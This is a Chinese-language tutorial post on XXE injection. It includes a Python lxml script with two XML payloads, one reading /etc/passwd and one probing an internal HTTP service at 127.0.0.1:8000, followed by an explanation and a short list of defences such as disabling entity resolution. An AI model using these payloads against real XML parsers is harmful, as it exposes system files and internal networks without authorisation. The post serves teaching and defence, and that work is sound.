当前位置：首页 > ops >正文

利用 XML 外部实体注入（XXE）读取文件和探测内部网络

ops 2025/7/30 12:46:47

利用 XML 外部实体注入（XXE）读取文件和探测内部网络

引言

XML 外部实体注入（XXE）是一种常见的安全漏洞，攻击者可以通过这种漏洞读取服务器上的文件或探测内部网络。本文将通过一个实际的 Python 代码示例，展示如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

什么是 XXE？

XML 外部实体注入（XXE）是指在解析 XML 数据时，如果 XML 解析器启用了外部实体解析功能，攻击者可以注入恶意的 XML 实体来访问服务器上的敏感文件或发起网络请求。这种漏洞通常出现在使用 XML 解析库的应用程序中，特别是在未正确配置解析器的情况下。

代码示例

以下是一个 Python 代码示例，展示了如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

from lxml import etree
import requests# XML payload to read /etc/passwd
x = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall><methodname>&xxe;</methodname>
</methodcall>
"""# XML payload to probe internal network (e.g., 127.0.0.1)
x1 = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:8000" >]>
<methodcall><methodname>&xxe;</methodname>
</methodcall>
"""def parse_xml(xml_bytes):try:# Parse the XML bytes with lxml, which supports external entitiesparser = etree.XMLParser(resolve_entities=True)root = etree.fromstring(xml_bytes, parser=parser)methodname = root.find('methodname').textprint(methodname)except Exception as e:print(f"Error: {e}")# Parse the first XML string
parse_xml(x)# Parse the second XML string
parse_xml(x1)

代码解析

XML Payload:
- x 和 x1 是两个字节字符串，分别包含外部实体 &xxe;。
- x 中的外部实体指向 /etc/passwd 文件。
- x1 中的外部实体指向 http://127.0.0.1:8000。
解析函数:
- parse_xml 函数使用 lxml.etree.fromstring 解析字节字符串，并打印 <methodname> 元素的内容。
- etree.XMLParser(resolve_entities=True) 参数启用外部实体解析。
解析 XML 字符串:
- 调用 parse_xml(x) 解析第一个 XML 字节字符串，读取 /etc/passwd 文件内容。
- 调用 parse_xml(x1) 解析第二个 XML 字节字符串，探测 http://127.0.0.1:8000 的内容。

运行结果

当运行上述代码时，如果成功读取到 /etc/passwd 文件，将会输出文件内容。如果成功探测到 http://127.0.0.1:8000，将会输出该 URL 的响应内容。

如何防御 XXE 漏洞

为了防止 XXE 漏洞，可以采取以下措施：

禁用外部实体解析：在解析 XML 时，禁用外部实体解析功能。例如，在 lxml 中，可以使用 etree.XMLParser(resolve_entities=False)。
使用安全的 XML 解析库：选择那些默认不解析外部实体的库。
输入验证：对用户输入进行严格的验证，确保输入的数据符合预期格式。
定期更新和打补丁：保持系统和库的最新状态，及时应用安全补丁。